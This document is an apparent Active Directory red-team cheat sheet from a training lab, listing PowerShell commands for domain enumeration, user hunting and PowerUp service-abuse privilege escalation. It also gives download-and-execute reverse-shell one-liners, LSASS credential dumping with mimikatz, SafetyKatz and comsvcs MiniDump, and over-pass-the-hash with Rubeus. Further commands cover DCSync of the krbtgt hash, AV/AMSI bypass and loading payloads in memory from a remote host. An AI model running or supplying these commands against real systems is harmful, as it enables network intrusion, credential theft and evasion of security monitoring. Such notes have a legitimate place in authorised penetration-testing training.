▒█████ █████▒ █████▒ ██████ ▓█████ ▄████▄ ██▒ █▓ ▄▄▄ █ ██ ██▓ ▄▄▄█████▓
▒██▒ ██▒▓██ ▒▓██ ▒▒██ ▒ ▓█ ▀ ▒██▀ ▀█▓██░ █▒▒████▄ ██ ▓██▒▓██▒ ▓ ██▒ ▓▒
▒██░ ██▒▒████ ░▒████ ░░ ▓██▄ ▒███ ▒▓█ ▄▓██ █▒░▒██ ▀█▄ ▓██ ▒██░▒██░ ▒ ▓██░ ▒░
▒██ ██░░▓█▒ ░░▓█▒ ░ ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██ █░░░██▄▄▄▄██ ▓▓█ ░██░▒██░ ░ ▓██▓ ░
░ ████▓▒░░▒█░ ░▒█░ ▒██████▒▒░▒████▒▒ ▓███▀ ░ ▒▀█░ ▓█ ▓██▒▒▒█████▓ ░██████▒▒██▒ ░
░ ▒░▒░▒░ ▒ ░ ▒ ░ ▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░ ░ ▐░ ▒▒ ▓▒█░░▒▓▒ ▒ ▒ ░ ▒░▓ ░▒ ░░
░ ▒ ▒░ ░ ░ ░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░░ ▒ ▒▒ ░░░▒░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ▒ ░░░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░
░ ░
Domain Enumeration | Powershell
using two tools [PowerView / ADModule]
- active directory powershell module
ADModule | domain enumeration
- bloodhound
BloodHound
-powerview
PowerView
-sharpview
SharpView
::: get current domain
PS> Get-Domain | (powerview)
PS> Get-ADDomain | (active directory module)
::: get object of another domain
PS> Get-Domain -Domain
PS> Get-ADDomain -Identity
::: get domain SID for the current domain
PS> Get-DomainSID
PS> (Get-ADDomain).DomainSID
::: get domain policy for current domain
PS> Get-DomainPolicyData
PS> Get-DomainPolicy
PS> (Get-DomainPolicyData).systemaccess
::: get domain policy for another domain
PS> (Get-DomainPolicyData –domain ).systemaccess
::: get domain controller for the current domain
PS> Get-DomainController
PS> Get-ADDomainController
::: get domain controller for another domain
PS> Get-DomainController -Domain
PS> Get-ADDomainController -DomainName -Discover
::: get list of user in current domain
PS> Get-DomainUser
PS> Get-DomainUser -Identity
PS> Get-ADUser -Filter * -Properties *
PS> Get-ADUser -Identity -Properties *
::: get list of users by name and its count
PS> Get-DomainUser | select samaccountname | measure
::: get list of properties of a user in current domain
PS> Get-DomainUser -Identity -Properties *
PS> Get-DomainUser -Properties samaccountname,logonCount | will help to retrieve and understand the normal activity of users
PS> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
PS> Get-ADUser -Filter * -Properties * | select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
::: search for a string in a user's attribute
PS> Get-DomainUser -LDAPFilter "Description=*STRING*" | select name,Description
PS> Get-ADUser -Filter 'Description -like "*STRING*"' -Properties Description | select name,Description
::: get a list of computers in the current domain
PS> Get-DomainComputer | select Name
PS> Get-DomainComputer -OperatingSystem "*Server 2016*"
PS> Get-DomainComputer -Ping
PS> Get-ADComputer -Filter * | select Name
PS> Get-ADComputer -Filter * -Properties *
PS> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
PS> Get-ADComputer -Filter * -Properties DNSHostname | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
::: get all groups in the current domain
PS> Get-DomainGroup | select Name
PS> Get-DomainGroup -Domain
PS> Get-ADGroup -Filter * | select Name
PS> Get-ADGroup -Filter * -Properties *
::: get all groups containing the word "admin" in group name
PS> Get-DomainGroup *admin*
PS> Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
::: get all members of the domain admin group
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS> Get-ADGroupMember -Identity "Domain Admins" -Recursive
::: get the group membership for a user
PS> Get-DomainGroup -UserName ""
PS> Get-ADPrincipalGroupMembership -Identity
::: list all local groups on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroup -ComputerName -ListGroups
::: get members of all the local groups on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroup -ComputerName -Recurse
::: get members of all the local group "Administrators" on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroupMember -ComputerName -GroupName Administrators
::: get actively logged users on a computer (need local admin rights on the target)
PS> Get-NetLoggedon -ComputerName
::: get locally logged users on a computer (need remote registry on the target - started by default on server OS)
PS> Get-LoggedonLocal -ComputerName
::: get the last logged user on a computer (need admin righst and remote registry on the target)
PS> Get-LastLoggedOn -ComputerName
::: find shares on hosts in current domain
PS> Invoke-ShareFinder -Verbose
::: find sensitive files on computers in the domain
PS> Invoke-FileFinder -Verbose
::: get all fileservers of the domain
PS> Get-NetFileServer
::: get kerberos policy
PS> (Get-DomainPolicy).KerberosPolicy
::: get domain admin_groups of forest
PS> Get-DomainGroup *admin* -domain | select samaccountname
-GPO-
::: get list of GPO in current domain
PS> Get-DomainGPO
PS> Get-DomainGPO -ComputerIdentity
::: get GPO which use restricted groups or groups.xml for interesting users
PS> Get-DomainGPOLocalGroup
::: get users which are in a local group of a machine using GPO
PS> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity
::: get machines where the given user is member of a specific group
PS> Get-DomainGPOUserLocalGroupMapping -Identity -Verbose
-OU-
::: get OU in a domain
PS> Get-DomainOU
PS> Get-ADOrganizationalUnit -Filter * -Properties *
::: get GPO applied on an OU. read GPOname from gplink attribute from Get-NetOU
PS> Get-DomainGPO -Identity "gplink/cn"
sample:
PS> Get-DomainGPO -Identity {00000000-0000-0000-0000-000000000000}
::: get attribute of an OU
PS> (Get-DomainOU -Identity ).attribute
sample:
PS> (Get-DomainOU -Identity Servers).gplink
::: filter name on results
PS> Get-DomainOU | select -ExpandProperty name
::: list all computers in a specific OU
PS> (Get-DomainOU -Identity [OUName]).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
-ACL-
::: enumerate ACL for domain admin group
in case another domain group is needed, just change it...
PS> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs –Verbose
::: get ACL associated with the specified object
PS> Get-DomainObjectAcl -SamAccountName -ResolveGUIDs
::: get ACL associated with the specified prefix to be used for search
PS> Get-DomainObjectAcl -SearchBase "STRING" -ResolveGUIDs -Verbose
::: enumerate ACLs using ActiveDirectory Module *** by ObjectDN
PS> (Get-Acl 'AD:\CN=Administrator,CN-Users,CD=dollarcorp,DC=moneycorp,DC=local').Access
::: search for interesting ACEs
PS> Find-InterestingDomainAcl -ResolveGUIDs
::: get ACL associated with specified path
PS> Get-PathAcl -Path "\\\sysvol"
::: show current ACL for a specific user
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -eq ""}
note: ?{$_. = means find everything
-TRUSTS-
Is a relationship between two domains or forests which allows users of one domain or forest to
access resources in the other domain or forest.
Trust can be automatic (parent-child, same forest etc.) or established (forest, external).
TDO / Trusted Domain Objects (represent the trust relation in a domain)
::: get list of all domain trusts for the current domain
PS> Get-DomainTrust
PS> Get-DomainTrust -Domain
PS> Get-ADTrust
PS> Get-ADTrust -Identity
::: list all trust current forest AD Module
PS> Get-ADForest | %{Get-ADTrust -Filter *}
::: list trust in current domain
PS> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'
::: list external trust in current forest
PS> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
::: map trusts of a forest
PS> Get-ForestTrust
PS> Get-ForestTrust -Forest
PS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
::: map trusts of current domain
PS> Get-ADTrust -Filter *
::: map trusts of external trust
PS> Get-ADTrust -Filter * -Server
-FOREST-
::: get details about the current forest
PS> Get-Forest
PS> Get-Forest -Forest
PS> Get-ADForest
PS> Get-ADForest - Identity
::: get all domains in the current forest
PS> Get-ForestDomain
PS> Get-ForestDomain -Forest
PS> (Get-ADForest).Domains
::: get all global catalogs for the current forest
PS> Get-ForestGlobalCatalog
PS> Get-ForestGlobalCatalog -Forest
PS> Get-ADForest | select -ExpandProperty GlobalCatalogs
-USER HUNTING-
::: get list of computers
PS> Get-NetComputer
::: find machines on the current domain where the current user has local admin access
PS> Find-LocalAdminAccess -Verbose
::: check if a computer has local admin access or not
PS> Get-NetComputer | Invoke-CheckLocalAdminAccess
::: find computers where a domain admin (or specified user/group) has sessions
PS> Find-DomainUserLocation -Verbose
PS> Find-DomainUserLocation -UserGroupIdentity ""
::: find computers where a domain admin session is available and current user has admin access
PS> Find-DomainUserLocation -CheckAccess
::: find computers (file servers and distributed file servers) where a domain admin session is available.
PS> Find-DomainUserLocation -Stealth
-PRIVILEGE ESCALATION-
Tools:
PowerUp
ways of escalation:
-Missing patches
–Automated deployment and AutoLogonpasswords in clear text
–AlwaysInstallElevated(Any user can run MSI as SYSTEM)
–Misconfigured Services
–DLL Hijacking and more
–NTLM Relaying a.k.a. Won't Fix
-PRIVESC LOCAL-
::: get services filepath
PS> Get-WmiObject -Class win32_service | select pathname
note: when checking for services path, it is really important to double check the entire path and if exist an unquoated service.
a service path can be abused if is not unquoated.
::: how to get security descriptors
PS> sc.exe sdshow
PS> sc.exe sdshow alg
PS> sc.exe sdshow snmptrap
POWERUP USAGE
::: import the tool powerUp
1. import invishell
2. . /path/to/file/PowerUp.ps1
::: get services with unquoated paths and a space in their name
PS> Get-ServiceUnquoated -Verbose
::: get services where the current user can write to its binary path or change arguments to the binary
PS> Get-ModifiableServiceFile -Verbose
::: get the services whose configuration current user can modify
PS> Get-ModifiableService -Verbose
::: abuse of "Get-ModifiableService" and add our current domain user to the local "Administrators" group
PS> Invoke-ServiceAbuse -Name '' -UserName ''
note: doing that will give you an user with local admin rights. to complete the abuse, after the configuration
is completed, logoff and logon once again.
::: get computers where the user added has local administrative access
Find-PSRemotingLocalAdminAccess.ps1 Tool Usage
powershell remoting...
** import inviShell and import the module [Find-PSRemotingLocalAdminAccess.ps1]
PS> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS> Find-PSRemotingLocalAdminAccess
note: in case exist any result, it means the user added has admin rights on the computer reflected.
::: how to connect to the computer using "winrs" as the student user
winrs
PS> winrs -r: cmd
PS> whoami
PS> hostname
::: how to connect to the computer using PowerShell Remoting
PS> Enter-PSSession -ComputerName
::: create encoded reverse shell using "Invoke-PowerShellTcp.ps1"
note: file "Invoke-PowerShellTcp.ps1" need to be available on a local web server.
PS> powershell.exe iex (iwr http:///Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress -Port
or
PS> powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress -Port 443
::: download a file locally
PS> iex (iwr http:///path/to/file -UseBasicParsing)
PS> iex ((New-Object Net.webClient).DownloadString('http:///path/to/file'))
-BLOODHOUND-
bloodhound tool
usage:
import sharphound.ps1
. C:\path\to\file\sharphound.ps1
PS> Invoke-BloodHound -CollectionMethod All -Verbose
to avoid detections like ATA [-ExcludeDC]
PS> Invoke-BloodHound -CollectionMethod All -ExcludeDC
-LATERAL MOVEMENT-
powershell remoting
ONE-TO-ONE | ONE-TO-MANY
::: store a session or new session in a variable
PS> $[variable_name] = New-PSSession -ComputerName [hostname]
PS> $b0ydC = New-PSSession -ComputerName ofsv-001
::: one to one
PSSession
- interactive
- runs in a new process (wsmprovhost)
- stateful
PS> New-PSSession
PS> Enter-PSSession
::: one to many
- non-interactive
- execute command pararelly
PS> Invoke-Command
**
::: use to execute commands or scriptblock
PS> Invoke-Command –Scriptblock{Get-Process} -ComputerName(Get-Content )
PS> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName (cat C:\path\to\file\with\hosts\.txt file)
::: use to execute script from file
PS> Invoke-Command –FilePathC:\scripts\Get-PassHashes.ps1 -ComputerName(Get-Content )
::: execute locally loaded function on the remote machines
PS> Invoke-Command -ScriptBlock${function:Get-PassHashes} -ComputerName(Get-Content )
::: execute "Stateful" commands using Invoke-Command
PS> $Sess = New-PSSession –Computername Invoke-Command –Session $Sess –ScriptBlock{$Proc=Get-Process} Invoke-Command –Session $Sess –ScriptBlock{$Proc.Name}
-LATERAL MOVEMENT : MIMIKATZ | EXTRACTING CREDENTIALS FROM LSASS-
::: dump credentials on a local machine using mimikatz
PS> Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
::: using safetykatz (minidump of lsass and PELoader to run mimikatz)
PS> SafetyKatz.exe "sekurlsa::ekeys"
::: dump credentials using sharpkatz (C# port of some of mimikatz functionality)
PS> SharpKatz.exe --Command ekeys
::: dump credentials using dumpert(direct system calls and API unhooking)
PS> rundll32.exe C:\Dumpert\Outflank-Dumpert.dll, Dump
::: dump using pypykatz (mimikatz functinality in python)
PS> pypykatz.exe live lsa
::: dump using comsvcs.dll
PS> tasklist /FI "IMAGENAME eq lsass.exe"
PS> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Public\lsass.dmp full
-LATERAL MOVEMENT: MIMIKATZ | OVER PASS THE HASH-
pass the hash = NTLM || over pass the hash = kerberos
::: over pass the hash generate tokens from hashes or keys. | need elevation, run as admin
- mimikatz
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256: /run:powershell.exe"'
- safetyKatz
PS> SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit"
::: rubeus.exe Usage
- NO elevation required
PS> rubeus.exe asktgt /user:administrator /rc4: /ptt
- elevation required
PS> Rubeus.exe asktgt /user:Administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
-LATERAL MOVEMENT : MIMIKATZ | DCSync-
::: use the DCSyncfeature for getting krbtgthash executed
both require admin privileges
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
PS> SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
-Offensive .NET - Tradecraft | AV bypass
like AMSI Trigger, exist Defender Check for Windows Defender.
here is the same as previously with AMSI when is needed to obfuscate the code to bypass signature detections.
minimal changes on strings matched with help.
Defender Check
-Offensive .NET - Tradecraft | String Manipulation
- minimal changes to the code with help to bypass this
- remember to check the code against any tool like AMSI Trigger, Defender Check, etc.
- download latest version of Mimikatz and Out-CompressedDll.ps1
--> Run the Out-CompressedDll.ps1 PowerShell script on Mimikatz binary and save the output to a file.
PS> Out-CompressedDll > outputfilename.txt
-Offensive .NET - Tradecraft | AV bypass - Obfuscation
::: obfuscate complete binary
Confuser Ex
-Offensive .NET - Tradecraft | Payload Delivery
NetLoader
It can be used to load binary from file path or URL and patch AMSI & ETW while executing.
PS> C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe
We also have AssemblyLoad.exe that can be used to load the Netloader in-memory from a URL which then loads a binary from a file path or URL.
PS> C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe